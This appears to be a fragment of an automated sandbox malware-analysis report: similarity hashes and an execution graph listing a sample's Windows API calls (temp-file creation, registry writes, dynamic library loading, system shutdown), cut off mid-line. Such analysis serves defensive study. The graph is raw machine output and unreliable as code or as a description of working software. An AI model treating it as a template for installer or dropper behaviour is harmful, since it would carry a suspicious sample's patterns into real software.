                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                              • Opcode ID: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                                              • Instruction ID: 9710050d3cc87503a6e3ad62db4a5623da0bea7fc0aec59e94b28eb5e14ff036
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F212CB0908315AFE710AF15E88496FBBF8EF44718F51883EF895A7281C3795851CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:6.9%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                                              Total number of Nodes:1296
                                                                                                                                                                                                                                                              Total number of Limit Nodes:15
                                                                                                                                                                                                                                                              execution_graph 7937 402340 7938 401456 18 API calls 7937->7938 7939 402345 IsWindow 7938->7939 7940 402354 7939->7940 8172 401dc0 8173 401400 18 API calls 8172->8173 8174 401dc5 8173->8174 8175 407836 MessageBoxIndirectA 8174->8175 8176 401dd8 8175->8176 8177 4031c0 8178 401400 18 API calls 8177->8178 8179 4031cc 8178->8179 8184 407cde lstrlenA 8179->8184 7768 402cc1 7769 402cd1 7768->7769 7770 402cc5 7768->7770 7772 401400 18 API calls 7769->7772 7774 402ceb 7769->7774 7771 401400 18 API calls 7770->7771 7771->7769 7772->7774 7773 401400 18 API calls 7776 402d14 WritePrivateProfileStringA 7773->7776 7775 401400 18 API calls 7774->7775 7777 402d05 7774->7777 7775->7777 7778 402d2d 7776->7778 7777->7773 7941 402541 7942 401456 18 API calls 7941->7942 7943 40254d 7942->7943 7944 401456 18 API calls 7943->7944 7945 40255c 7944->7945 7946 402578 EnableWindow 7945->7946 7947 40256d ShowWindow 7945->7947 7948 4037d4 7946->7948 7947->7948 7949 403141 7952 407c08 7949->7952 7953 403155 CloseHandle 7952->7953 7450 401842 7451 401400 18 API calls 7450->7451 7452 401847 SetFileAttributesA 7451->7452 7453 401aff 7452->7453 7954 408d43 7958 408a96 7954->7958 7955 408cf0 7956 408b69 GlobalAlloc 7956->7955 7956->7958 7957 408b4d GlobalFree 7957->7956 7958->7955 7958->7956 7958->7957 7959 408c55 GlobalAlloc 7958->7959 7960 408c45 GlobalFree 7958->7960 7959->7955 7959->7958 7960->7959 7454 405c44 7455 405c8f 7454->7455 7456 405c6f 7454->7456 7458 405c9c GetDlgItem 7455->7458 7463 405d60 7455->7463 7519 407805 GetDlgItemTextA 7456->7519 7460 405cbc 7458->7460 7459 405c7f 7462 407d37 5 API calls 7459->7462 7466 405cd7 SetWindowTextA 7460->7466 7471 407935 3 API calls 7460->7471 7461 405c89 7464 4060cd 7461->7464 7525 407805 GetDlgItemTextA 7461->7525 7462->7461 7463->7461 7468 407e06 18 API calls 7463->7468 7543 404f0f 7464->7543 7520 404d65 7466->7520 7473 405dd9 SHBrowseForFolderA 7468->7473 7469 405eb6 7474 40815b 17 API calls 7469->7474 7476 405cc9 7471->7476 7473->7461 7478 405dfa CoTaskMemFree 7473->7478 7479 405ec0 7474->7479 7476->7466 7483 407cf2 3 API calls 7476->7483 7481 407cf2 3 API calls 7478->7481 7526 407cb6 lstrcpynA 7479->7526 7485 405e0c 7481->7485 7487 405cd6 7483->7487 7489 405e65 7485->7489 7493 407e06 18 API calls 7485->7493 7486 405edb 7490 408299 5 API calls 7486->7490 7487->7466 7524 4077fb SetDlgItemTextA 7489->7524 7498 405ee9 7490->7498 7494 405e34 lstrcmpiA 7493->7494 7494->7489 7496 405e51 7494->7496 7495 405ef2 7527 407cb6 lstrcpynA 7495->7527 7523 407ce8 lstrcatA 7496->7523 7498->7495 7504 4078ce 2 API calls 7498->7504 7506 405f45 7498->7506 7500 405f02 7501 407935 3 API calls 7500->7501 7502 405f10 GetDiskFreeSpaceA 7501->7502 7505 405fb9 MulDiv 7502->7505 7502->7506 7504->7498 7505->7506 7507 406060 7506->7507 7528 404da2 7506->7528 7509 406099 7507->7509 7510 403903 2 API calls 7507->7510 7541 404d44 EnableWindow 7509->7541 7510->7509 7513 4060ba 7513->7464 7542 404d05 SendMessageA 7513->7542 7519->7459 7521 407e06 18 API calls 7520->7521 7522 404d8c 7521->7522 7525->7469 7526->7486 7527->7500 7529 404db5 7528->7529 7530 407e06 18 API calls 7529->7530 7531 404e3c 7530->7531 7532 407e06 18 API calls 7531->7532 7533 404e51 7532->7533 7534 407e06 18 API calls 7533->7534 7535 404e65 7534->7535 7557 407cde lstrlenA 7535->7557 7541->7513 7542->7464 7544 404f2e GetWindowLongA 7543->7544 7554 404f27 7543->7554 7545 404f4a 7544->7545 7544->7554 7546 404f52 GetSysColor 7545->7546 7547 404f5c 7545->7547 7546->7547 7548 404f71 SetBkMode 7547->7548 7549 404f62 SetTextColor 7547->7549 7550 404f9c 7548->7550 7551 404f8f GetSysColor 7548->7551 7549->7548 7552 404fa2 SetBkColor 7550->7552 7553 404fb4 7550->7553 7551->7550 7552->7553 7553->7554 7555 404fd1 CreateBrushIndirect 7553->7555 7556 404fc7 DeleteObject 7553->7556 7555->7554 7556->7555 7779 404ec8 lstrcpynA 7782 407cde lstrlenA 7779->7782 7558 401e4a 7571 401456 7558->7571 7572 407e06 18 API calls 7571->7572 7573 401477 7572->7573 7574 404a4c 7575 404a5e 7574->7575 7576 404a68 GlobalAlloc 7575->7576 7577 404a86 7575->7577 7576->7577 7578 402e4d 7579 402e51 7578->7579 7580 401400 18 API calls 7579->7580 7581 402e74 7580->7581 7582 401400 18 API calls 7581->7582 7583 402e87 RegCreateKeyExA 7582->7583 7584 402ee4 7583->7584 7589 403677 7583->7589 7585 402f06 7584->7585 7586 402ee9 7584->7586 7587 402f24 7585->7587 7588 402f0b 7585->7588 7590 401400 18 API calls 7586->7590 7592 402f54 RegSetValueExA 7587->7592 7594 403d52 45 API calls 7587->7594 7591 401456 18 API calls 7588->7591 7593 402ef5 7590->7593 7597 402f02 7591->7597 7595 40307b RegCloseKey 7592->7595 7598 407cde lstrlenA 7593->7598 7594->7597 7595->7589 7597->7592 8185 4023cd GetDlgItem GetClientRect 8186 401400 18 API calls 8185->8186 8187 402419 LoadImageA SendMessageA 8186->8187 8188 40246e DeleteObject 8187->8188 8189 40382f 8187->8189 8188->8189 7961 40374e 7962 401456 18 API calls 7961->7962 7963 403753 7962->7963 7964 4037a0 7963->7964 7965 4036cd 7963->7965 7966 402a3c 7963->7966 7964->7966 7967 407e06 18 API calls 7964->7967 7965->7966 7968 403700 7965->7968 7969 4036eb 7965->7969 7967->7966 7971 407e06 18 API calls 7968->7971 7970 401456 18 API calls 7969->7970 7970->7966 7971->7966 8190 4033cf FindClose 7783 4016d4 7784 401cc4 7783->7784 7785 406fcb 23 API calls 7784->7785 7786 401cc9 7785->7786 7793 407cb6 lstrcpynA 7786->7793 7788 402141 7794 407cb6 lstrcpynA 7788->7794 7790 402157 7795 407cb6 lstrcpynA 7790->7795 7792 4036c5 7793->7788 7794->7790 7795->7792 7796 406ed7 7797 406ef1 7796->7797 7798 406f0b 7796->7798 7797->7798 7799 406ef7 7797->7799 7800 406f13 IsWindowVisible 7798->7800 7801 406f31 7798->7801 7802 404bd7 SendMessageA 7799->7802 7803 406f21 7800->7803 7804 406f9d CallWindowProcA 7800->7804 7801->7804 7815 407cb6 lstrcpynA 7801->7815 7805 406f03 7802->7805 7806 406557 4 API calls 7803->7806 7804->7805 7806->7801 7808 406f66 7816 407be3 wsprintfA 7808->7816 7810 406f78 7811 403903 2 API calls 7810->7811 7812 406f86 7811->7812 7817 407cb6 lstrcpynA 7812->7817 7814 406f9b 7814->7804 7815->7808 7816->7810 7817->7814 7979 401f58 7980 401400 18 API calls 7979->7980 7981 401f5d ExpandEnvironmentStringsA 7980->7981 7982 401f8a 7981->7982 7984 401f7c 7981->7984 7983 401f97 lstrcmpA 7982->7983 7982->7984 7983->7984 7818 4026da 7819 401400 18 API calls 7818->7819 7820 4026df 7819->7820 7821 408123 2 API calls 7820->7821 7822 4026e8 7821->7822 7824 402704 7822->7824 7825 407be3 wsprintfA 7822->7825 7825->7824 8191 402bdd 8192 401400 18 API calls 8191->8192 8193 402be2 8192->8193 8194 401400 18 API calls 8193->8194 8195 402bf1 8194->8195 8196 401400 18 API calls 8195->8196 8197 402c00 8196->8197 8198 408123 2 API calls 8197->8198 8199 402c0b 8198->8199 8200 402c8d 8199->8200 8209 407cde lstrlenA 8199->8209 8202 406fcb 23 API calls 8200->8202 8206 402ca1 8202->8206 7985 40395e 7986 403973 SetTimer 7985->7986 7987 403999 7985->7987 7986->7987 7991 4039f0 7987->7991 7992 40392c MulDiv 7987->7992 7989 4039a5 wsprintfA SetWindowTextA 7993 4077fb SetDlgItemTextA 7989->7993 7992->7989 8210 4037de SendMessageA 8211 40380d InvalidateRect 8210->8211 8212 40382c 8210->8212 8211->8212 7606 402865 7607 401400 18 API calls 7606->7607 7608 402875 7607->7608 7609 401400 18 API calls 7608->7609 7610 402884 7609->7610 7611 402890 LoadLibraryExA 7610->7611 7612 4028b8 GetModuleHandleA 7610->7612 7613 402970 7611->7613 7614 4028b6 7611->7614 7612->7611 7615 4028c8 GetProcAddress 7612->7615 7619 40163b 23 API calls 7613->7619 7614->7615 7616 40292d 7615->7616 7617 4028dd 7615->7617 7618 406fcb 23 API calls 7616->7618 7621 40163b 23 API calls 7617->7621 7622 4028ef 7617->7622 7618->7622 7620 402a3b 7619->7620 7621->7622 7622->7620 7623 402962 FreeLibrary 7622->7623 7623->7620 7826 4020e6 7827 40216e 7826->7827 7831 4020f0 7826->7831 7828 4021a1 GlobalAlloc 7827->7828 7829 402172 7827->7829 7830 407e06 18 API calls 7828->7830 7843 40219b 7829->7843 7846 407cb6 lstrcpynA 7829->7846 7830->7843 7833 407e06 18 API calls 7831->7833 7834 402127 7831->7834 7836 402115 7833->7836 7844 407cb6 lstrcpynA 7834->7844 7835 402189 GlobalFree 7835->7843 7838 407836 MessageBoxIndirectA 7836->7838 7838->7834 7839 402141 7845 407cb6 lstrcpynA 7839->7845 7841 402157 7847 407cb6 lstrcpynA 7841->7847 7844->7839 7845->7841 7846->7835 7847->7843 7354 401867 7375 401400 7354->7375 7357 407935 3 API calls 7369 401879 7357->7369 7358 401905 7359 401942 7358->7359 7360 40190e 7358->7360 7364 40163b 23 API calls 7359->7364 7370 403677 7359->7370 7380 40163b 7360->7380 7361 4078a4 CharNextA 7361->7369 7364->7370 7366 40774b 2 API calls 7366->7369 7367 4082eb 5 API calls 7367->7369 7368 40192b SetCurrentDirectoryA 7368->7370 7369->7358 7369->7361 7369->7366 7369->7367 7371 4018b7 7369->7371 7372 4018dd GetFileAttributesA 7369->7372 7371->7369 7374 401902 7371->7374 7384 4076b0 CreateDirectoryA 7371->7384 7372->7369 7374->7358 7376 407e06 18 API calls 7375->7376 7377 40143a 7376->7377 7378 407d37 5 API calls 7377->7378 7379 40144b 7377->7379 7378->7379 7379->7357 7381 406fcb 23 API calls 7380->7381 7382 401654 7381->7382 7383 407cb6 lstrcpynA 7382->7383 7383->7368 7385 407710 7384->7385 7386 407714 GetLastError 7384->7386 7385->7371 7386->7385 7387 407723 SetFileSecurityA 7386->7387 7387->7385 7388 40773f GetLastError 7387->7388 7388->7385 8213 4021ea 8214 401456 18 API calls 8213->8214 8215 4021ef 8214->8215 8216 401456 18 API calls 8215->8216 8217 4021fe 8216->8217 8218 401400 18 API calls 8217->8218 8219 402216 8217->8219 8218->8219 8220 401400 18 API calls 8219->8220 8224 40222e 8219->8224 8220->8224 8221 402245 8225 401456 18 API calls 8221->8225 8222 4022c6 8223 401400 18 API calls 8222->8223 8227 4022cb 8223->8227 8224->8221 8224->8222 8226 40224a 8225->8226 8228 401456 18 API calls 8226->8228 8229 401400 18 API calls 8227->8229 8230 40225d 8228->8230 8231 4022de FindWindowExA 8229->8231 8232 4022a9 SendMessageA 8230->8232 8233 402269 SendMessageTimeoutA 8230->8233 8235 402308 8231->8235 8232->8235 8233->8235 8234 402332 8235->8234 8237 407be3 wsprintfA 8235->8237 8237->8234 7994 40316b 7995 401400 18 API calls 7994->7995 7996 403170 7995->7996 8007 407a78 GetFileAttributesA CreateFileA 7996->8007 7998 40318d 7999 402530 7998->7999 8000 403199 7998->8000 8006 407be3 wsprintfA 7999->8006 8008 407be3 wsprintfA 8000->8008 8003 40253c 8004 40347d 8009 407cb6 lstrcpynA 8004->8009 8006->8003 8007->7998 8008->8004 8009->8003 7848 401aed 7849 401400 18 API calls 7848->7849 7850 401af2 7849->7850 7851 401aff 7850->7851 7852 407ad4 2 API calls 7850->7852 7852->7851 8238 404fed 8239 405013 8238->8239 8240 405007 8238->8240 8242 405025 GetDlgItem GetDlgItem 8239->8242 8243 40509d 8239->8243 8240->8239 8241 40555f 8240->8241 8244 405564 SetWindowPos 8241->8244 8245 4055a6 8241->8245 8246 404d65 18 API calls 8242->8246 8247 4050c1 8243->8247 8257 403845 2 API calls 8243->8257 8248 4056a8 8244->8248 8249 4055ab ShowWindow 8245->8249 8250 4055cf 8245->8250 8251 405071 SetClassLongA 8246->8251 8252 404bd7 SendMessageA 8247->8252 8258 405134 8247->8258 8253 404f0f 8 API calls 8248->8253 8249->8248 8254 4055f1 8250->8254 8255 4055d7 DestroyWindow 8250->8255 8256 403903 2 API calls 8251->8256 8290 4050cd 8252->8290 8253->8258 8259 4055f6 SetWindowLongA 8254->8259 8260 40561c 8254->8260 8302 4053e3 8255->8302 8256->8243 8261 4050ef 8257->8261 8259->8258 8260->8248 8263 405628 GetDlgItem 8260->8263 8261->8247 8262 4050f5 SendMessageA 8261->8262 8262->8258 8267 405650 SendMessageA IsWindowEnabled 8263->8267 8268 405641 8263->8268 8264 40553d ShowWindow 8264->8258 8265 40537a DestroyWindow EndDialog 8265->8302 8266 403903 2 API calls 8266->8290 8267->8258 8267->8268 8269 405693 8268->8269 8271 4056f7 SendMessageA 8268->8271 8273 4056b1 8268->8273 8279 405647 8268->8279 8269->8271 8269->8279 8270 407e06 18 API calls 8270->8290 8271->8248 8272 404cc8 SendMessageA 8272->8248 8274 4056d3 8273->8274 8275 4056ba 8273->8275 8278 403903 2 API calls 8274->8278 8277 403903 2 API calls 8275->8277 8276 404d65 18 API calls 8276->8290 8277->8279 8278->8279 8279->8248 8279->8272 8280 404d65 18 API calls 8281 4051bc GetDlgItem 8280->8281 8282 4051e7 ShowWindow 8281->8282 8281->8290 8282->8290 8284 40525a EnableMenuItem SendMessageA 8285 4052af SendMessageA 8284->8285 8284->8290 8285->8290 8287 4053c8 DestroyWindow 8289 405407 CreateDialogParamA 8287->8289 8287->8302 8291 405448 8289->8291 8289->8302 8290->8258 8290->8265 8290->8266 8290->8270 8290->8276 8290->8280 8290->8282 8290->8284 8290->8287 8294 407e06 18 API calls 8290->8294 8303 404d44 EnableWindow 8290->8303 8304 404c96 SendMessageA 8290->8304 8305 407cb6 lstrcpynA 8290->8305 8306 407cde lstrlenA 8290->8306 8293 404d65 18 API calls 8291->8293 8295 40545f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 8293->8295 8296 405314 SetWindowTextA 8294->8296 8297 403845 2 API calls 8295->8297 8298 403845 2 API calls 8296->8298 8299 4054ee 8297->8299 8298->8290 8299->8258 8300 4054fd ShowWindow 8299->8300 8301 404bd7 SendMessageA 8300->8301 8301->8302 8302->8258 8302->8264 8303->8290 8304->8290 8305->8290 8010 40196f 8011 401400 18 API calls 8010->8011 8012 401974 8011->8012 8013 401400 18 API calls 8012->8013 8014 401983 8013->8014 8015 401400 18 API calls 8014->8015 8016 401992 MoveFileA 8015->8016 8017 4019b2 8016->8017 8018 4019a6 8016->8018 8020 408123 2 API calls 8017->8020 8022 402a3c 8017->8022 8019 40163b 23 API calls 8018->8019 8018->8022 8019->8022 8021 4019c7 8020->8021 8021->8022 8023 408311 39 API calls 8021->8023 8023->8018 8024 402371 8025 401456 18 API calls 8024->8025 8026 402376 8025->8026 8027 401456 18 API calls 8026->8027 8028 402385 GetDlgItem 8027->8028 8029 402530 8028->8029 8032 407be3 wsprintfA 8029->8032 8031 40253c 8032->8031 8307 4019f1 8308 401400 18 API calls 8307->8308 8309 4019f6 GetFullPathNameA 8308->8309 8311 401a25 8309->8311 8316 401a58 8309->8316 8310 401a7b GetShortPathNameA 8312 403831 8310->8312 8313 408123 2 API calls 8311->8313 8311->8316 8314 401a3e 8313->8314 8314->8316 8317 407cb6 lstrcpynA 8314->8317 8316->8310 8316->8312 8317->8316 6852 404375 SetErrorMode GetVersion 6853 4043a7 6852->6853 6854 40439b 6852->6854 6856 4043d9 6853->6856 6947 40820e GetSystemDirectoryA 6853->6947 6855 408299 5 API calls 6854->6855 6855->6853 6950 408299 GetModuleHandleA 6856->6950 6859 4043c8 lstrlenA 6859->6853 6861 408299 5 API calls 6862 4043f2 InitCommonControls OleInitialize SHGetFileInfoA 6861->6862 6956 407cb6 lstrcpynA 6862->6956 6864 404457 GetCommandLineA 6957 407cb6 lstrcpynA 6864->6957 6866 40446f GetModuleHandleA 6867 404494 6866->6867 6958 4078a4 6867->6958 6870 404560 GetTempPathA 6962 4042bc 6870->6962 6873 404580 DeleteFileA 6971 403f03 GetTickCount GetModuleFileNameA 6873->6971 6874 4045a7 GetWindowsDirectoryA 7064 407ce8 lstrcatA 6874->7064 6876 4078a4 CharNextA 6878 4044be 6876->6878 6878->6870 6878->6876 6880 404523 6878->6880 7063 407cb6 lstrcpynA 6880->7063 6886 40453d 6886->6870 6887 40459a 6890 4045dd 6887->6890 6891 4078a4 CharNextA 6887->6891 6923 40465b 6887->6923 6889 404826 7095 407836 6889->7095 7086 404316 6890->7086 6895 404608 6891->6895 6893 404844 6894 404836 ExitProcess 6893->6894 6897 408299 5 API calls 6893->6897 6899 404662 6895->6899 6902 40461c 6895->6902 6898 40485d 6897->6898 6901 408299 5 API calls 6898->6901 7082 4082eb 6899->7082 6905 40486c 6901->6905 7065 40815b 6902->7065 6906 408299 5 API calls 6905->6906 6909 40487b 6906->6909 6911 4048be 6909->6911 6915 4048a1 GetCurrentProcess 6909->6915 6917 408299 5 API calls 6911->6917 6915->6911 6916 404649 7081 407cb6 lstrcpynA 6916->7081 6921 40493f 6917->6921 6924 404944 ExitWindowsEx 6921->6924 6927 404991 6921->6927 7001 4060fd 6923->7001 6924->6894 6924->6927 7099 403903 6927->7099 6948 40823c wsprintfA LoadLibraryExA 6947->6948 6948->6859 6951 4082bb 6950->6951 6952 4082cc GetProcAddress 6950->6952 6954 40820e 3 API calls 6951->6954 6953 4043e5 6952->6953 6953->6861 6955 4082c3 6954->6955 6955->6952 6955->6953 6956->6864 6957->6866 6959 4078b1 6958->6959 6960 4044ac CharNextA 6959->6960 6961 4078bb CharNextA 6959->6961 6960->6878 6961->6959 7102 407d37 6962->7102 6964 4042ce 6965 404312 6964->6965 7111 407cf2 lstrlenA CharPrevA 6964->7111 6965->6873 6965->6874 7123 407a78 GetFileAttributesA CreateFileA 6971->7123 6973 403f5b 7000 404012 6973->7000 7124 407cb6 lstrcpynA 6973->7124 6975 403f87 7125 4078ce lstrlenA 6975->7125 6979 403fa8 GetFileSize 6983 403fce 6979->6983 6980 4040c3 7132 4039fe 6980->7132 6983->6980 6985 404006 6983->6985 6990 4039fe 31 API calls 6983->6990 6983->7000 7130 403ae9 ReadFile 6983->7130 6987 4039fe 31 API calls 6985->6987 6986 404172 GlobalAlloc 6988 404197 6986->6988 6987->7000 6992 407ad4 2 API calls 6988->6992 6990->6983 6991 404149 6993 403ae9 ReadFile 6991->6993 6994 4041a7 CreateFileA 6992->6994 6995 40415a 6993->6995 6996 4041f6 6994->6996 6994->7000 6995->6986 6995->7000 7148 403b31 SetFilePointer 6996->7148 6998 404206 7149 403d52 6998->7149 7000->6887 7002 408299 5 API calls 7001->7002 7003 406117 7002->7003 7004 406136 7003->7004 7005 40611c 7003->7005 7006 407b3a 3 API calls 7004->7006 7242 407be3 wsprintfA 7005->7242 7007 40616c 7006->7007 7009 407b3a 3 API calls 7007->7009 7012 4061a4 7007->7012 7009->7012 7011 406131 7233 404ae0 7011->7233 7243 407ce8 lstrcatA 7012->7243 7015 40815b 17 API calls 7016 4061e5 7015->7016 7017 4062bc 7016->7017 7019 407b3a 3 API calls 7016->7019 7018 40815b 17 API calls 7017->7018 7020 4062ca 7018->7020 7021 406228 7019->7021 7022 4062e7 LoadImageA 7020->7022 7023 407e06 18 API calls 7020->7023 7021->7017 7026 40625a 7021->7026 7031 4078a4 CharNextA 7021->7031 7024 406405 7022->7024 7025 40632f RegisterClassA 7022->7025 7027 4062e5 7023->7027 7029 403903 2 API calls 7024->7029 7028 406374 SystemParametersInfoA CreateWindowExA 7025->7028 7061 40636d 7025->7061 7244 407cde lstrlenA 7026->7244 7027->7022 7028->7024 7030 406411 7029->7030 7034 404ae0 19 API calls 7030->7034 7030->7061 7031->7026 7038 406421 7034->7038 7041 406513 7038->7041 7042 40642e ShowWindow 7038->7042 7245 404c0d OleInitialize 7041->7245 7046 40820e 3 API calls 7042->7046 7049 406452 7046->7049 7048 40651f 7051 406541 7048->7051 7052 406524 7048->7052 7053 406464 GetClassInfoA 7049->7053 7054 40820e 3 API calls 7049->7054 7055 403903 2 API calls 7051->7055 7058 403903 2 API calls 7052->7058 7052->7061 7056 40648a GetClassInfoA RegisterClassA 7053->7056 7057 4064be DialogBoxParamA 7053->7057 7059 406463 7054->7059 7055->7061 7056->7057 7060 403903 2 API calls 7057->7060 7058->7061 7059->7053 7062 406504 7060->7062 7061->6890 7062->7061 7063->6886 7260 407cb6 lstrcpynA 7065->7260 7067 408176 7261 407935 CharNextA CharNextA 7067->7261 7070 40462a 7070->6890 7080 407cb6 lstrcpynA 7070->7080 7071 407d37 5 API calls 7072 408197 7071->7072 7072->7070 7078 4081ab 7072->7078 7073 4081b7 lstrlenA 7074 4081ea 7073->7074 7073->7078 7076 407cf2 3 API calls 7074->7076 7077 4081ef GetFileAttributesA 7076->7077 7077->7070 7078->7070 7078->7073 7079 4078ce 2 API calls 7078->7079 7267 408123 FindFirstFileA 7078->7267 7079->7078 7080->6916 7081->6923 7083 408299 5 API calls 7082->7083 7084 404667 7083->7084 7085 407ce8 lstrcatA 7084->7085 7087 404326 CloseHandle 7086->7087 7088 40433a 7086->7088 7087->7088 7089 404344 CloseHandle 7088->7089 7090 404358 7088->7090 7089->7090 7270 4049da 7090->7270 7096 407850 7095->7096 7097 407855 MessageBoxIndirectA 7095->7097 7096->7097 7098 4078a0 7096->7098 7097->7098 7098->6894 7100 403845 2 API calls 7099->7100 7101 403925 7100->7101 7101->6894 7109 407d48 7102->7109 7103 407dd5 7104 407dde CharPrevA 7103->7104 7105 407dfc 7103->7105 7104->7103 7105->6964 7106 407dc7 CharNextA 7106->7109 7107 4078a4 CharNextA 7107->7109 7108 407d9c CharNextA 7108->7109 7109->7103 7109->7106 7109->7107 7109->7108 7110 407db8 CharNextA 7109->7110 7110->7106 7112 407d1c 7111->7112 7114 4042f0 7111->7114 7122 407ce8 lstrcatA 7112->7122 7115 40774b CreateDirectoryA 7114->7115 7116 4042fd 7115->7116 7117 40776f GetLastError 7115->7117 7118 407ad4 7116->7118 7117->7116 7119 407ae8 7118->7119 7120 407b27 7119->7120 7121 407aeb GetTickCount GetTempFileNameA 7119->7121 7120->6965 7121->7119 7121->7120 7123->6973 7124->6975 7126 4078e4 7125->7126 7127 4078e9 CharPrevA 7126->7127 7128 403f97 7126->7128 7127->7126 7127->7128 7129 407cb6 lstrcpynA 7128->7129 7129->6979 7131 403b22 7130->7131 7131->6983 7133 403a0b 7132->7133 7134 403a2d 7132->7134 7135 403a14 DestroyWindow 7133->7135 7136 403a1e 7133->7136 7137 403a36 7134->7137 7138 403a48 GetTickCount 7134->7138 7135->7136 7136->6986 7136->7000 7147 403b31 SetFilePointer 7136->7147 7164 408848 7137->7164 7138->7136 7140 403a5a 7138->7140 7141 403a9b CreateDialogParamA ShowWindow 7140->7141 7142 403a63 7140->7142 7146 403a99 7141->7146 7142->7136 7168 40392c MulDiv 7142->7168 7144 403a74 wsprintfA 7169 406fcb 7144->7169 7146->7136 7147->6991 7148->6998 7150 403d92 7149->7150 7151 403d62 SetFilePointer 7149->7151 7212 403b63 GetTickCount 7150->7212 7151->7150 7154 403ea8 7154->7000 7155 403da9 ReadFile 7155->7154 7156 403de2 7155->7156 7156->7154 7157 403b63 41 API calls 7156->7157 7158 403dfe 7157->7158 7158->7154 7159 403eba ReadFile 7158->7159 7160 403e15 7158->7160 7159->7154 7160->7154 7161 403e23 WriteFile 7160->7161 7162 403e51 7161->7162 7163 403eaf 7161->7163 7162->7160 7162->7163 7163->7154 7165 40885d PeekMessageA 7164->7165 7166 408881 DispatchMessageA 7165->7166 7167 40888d 7165->7167 7166->7165 7167->7136 7168->7144 7170 406fe2 7169->7170 7180 4070f3 7169->7180 7173 407002 7170->7173 7183 407e06 7170->7183 7202 407cde lstrlenA 7173->7202 7180->7146 7190 407e16 7183->7190 7184 407ef9 7185 407f1e 7184->7185 7204 407cb6 lstrcpynA 7184->7204 7185->7173 7187 407f25 GetVersion 7188 407f34 7187->7188 7188->7190 7193 407fbb GetSystemDirectoryA 7188->7193 7196 407fe1 GetWindowsDirectoryA 7188->7196 7198 407e06 11 API calls 7188->7198 7199 408002 SHGetSpecialFolderLocation 7188->7199 7205 407b3a RegOpenKeyExA 7188->7205 7189 407ee3 lstrlenA 7189->7190 7190->7184 7190->7187 7190->7189 7194 407e06 11 API calls 7190->7194 7197 407d37 5 API calls 7190->7197 7203 407be3 wsprintfA 7190->7203 7210 407cb6 lstrcpynA 7190->7210 7211 407ce8 lstrcatA 7190->7211 7193->7188 7194->7190 7196->7188 7197->7190 7198->7188 7199->7188 7200 408069 SHGetPathFromIDListA CoTaskMemFree 7199->7200 7200->7188 7203->7190 7204->7185 7206 407b81 RegQueryValueExA 7205->7206 7207 407bdc 7205->7207 7208 407bbc RegCloseKey 7206->7208 7207->7188 7208->7207 7210->7190 7213 403b93 7212->7213 7214 403d35 7212->7214 7225 403b31 SetFilePointer 7213->7225 7215 4039fe 31 API calls 7214->7215 7217 403cec 7215->7217 7217->7154 7217->7155 7218 403ba3 SetFilePointer 7222 403be3 7218->7222 7219 403ae9 ReadFile 7219->7222 7221 4039fe 31 API calls 7221->7222 7222->7217 7222->7219 7222->7221 7223 403c98 WriteFile 7222->7223 7224 403d13 SetFilePointer 7222->7224 7226 40893d 7222->7226 7223->7217 7223->7222 7224->7214 7225->7218 7227 40896b 7226->7227 7228 408cf0 7226->7228 7227->7228 7229 408b69 GlobalAlloc 7227->7229 7230 408b4d GlobalFree 7227->7230 7231 408c55 GlobalAlloc 7227->7231 7232 408c45 GlobalFree 7227->7232 7228->7222 7229->7227 7229->7228 7230->7229 7231->7227 7231->7228 7232->7231 7234 404af5 7233->7234 7252 407be3 wsprintfA 7234->7252 7236 404b73 7237 407e06 18 API calls 7236->7237 7238 404b89 SetWindowTextA 7237->7238 7239 404bad 7238->7239 7240 404bcf 7239->7240 7241 407e06 18 API calls 7239->7241 7240->7015 7241->7239 7242->7011 7253 404bd7 7245->7253 7247 404c64 7249 404bd7 SendMessageA 7247->7249 7248 404c41 7248->7247 7256 403845 7248->7256 7250 404c81 OleUninitialize 7249->7250 7250->7048 7252->7236 7254 404be0 SendMessageA 7253->7254 7255 404c0a 7253->7255 7254->7255 7255->7248 7258 403854 7256->7258 7257 4038f0 7257->7248 7258->7257 7259 4038a0 MulDiv SendMessageA 7258->7259 7259->7258 7260->7067 7262 40795a 7261->7262 7263 4078a4 CharNextA 7262->7263 7266 407976 7262->7266 7264 40798a 7263->7264 7265 4078a4 CharNextA 7264->7265 7264->7266 7265->7266 7266->7070 7266->7071 7268 408155 7267->7268 7269 408146 FindClose 7267->7269 7268->7078 7269->7268 7271 4049f4 7270->7271 7272 40435d 7271->7272 7273 4049f9 FreeLibrary GlobalFree 7271->7273 7274 4085b8 7272->7274 7273->7271 7275 40815b 17 API calls 7274->7275 7276 4085cf 7275->7276 7277 4085d6 DeleteFileA 7276->7277 7278 4085f3 7276->7278 7305 404371 OleUninitialize 7277->7305 7280 4087b6 7278->7280 7278->7305 7313 407cb6 lstrcpynA 7278->7313 7282 408123 2 API calls 7280->7282 7280->7305 7281 